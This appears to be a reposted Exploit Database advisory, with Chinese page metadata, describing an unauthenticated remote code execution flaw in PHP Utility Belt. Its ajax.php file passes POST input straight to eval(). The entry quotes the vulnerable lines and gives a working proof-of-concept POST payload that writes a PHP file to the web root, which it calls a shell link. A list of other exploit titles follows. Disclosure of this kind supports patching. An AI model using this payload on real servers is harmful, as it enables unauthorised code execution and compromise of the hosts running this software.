PHP Utility Belt – Remote Code Execution

Exploit Database
32 阅读

作者： WICS

日期： 2015-12-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38901/

Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author : WICS
Date : 8/12/2015
Software Link: https://github.com/mboynes/php-utility-belt

Overview:


PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.
ajax.php is accessible without any authentication 

Vulnerable code (Line number 12 to 15)

if ( isset( $_POST['code'] ) ) {
if ( false === eval( $_POST['code'] ) )
echo 'PHP Error encountered, execution halted';
}


POC
Access URL 
http://127.0.0.1/php-utility-belt/ajax.php
in Post data type 
code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');

above code will generate info.php file which will display php info
Shell link will be 
http://127.0.0.1/php-utility-belt/info.php

last Exploits
PHP Utility Belt – Remote Code Execution的更多信息

WordPress Plugin contact-form-7 5.1.6 – Remote File Upload：
Vehicle Parking Tracker System 1.0 – ‘Owner Name’ Stored Cross-Site Scripting：
Douran Portal 3.9.7.55 – Arbitrary File Upload / Cross-Site Scripting：
Code Widgets DataBound Index Style Menu – ‘category.asp’ SQL Injection：
Mambo Component N-Frettir – SQL Injection：
Art Gallery Management System Project in PHP v 1.0 – SQL injection：
WordPress Plugin SendIt 1.5.9 – Blind SQL Injection：
Joomla! Component YouTube 1.5 – SQL Injection：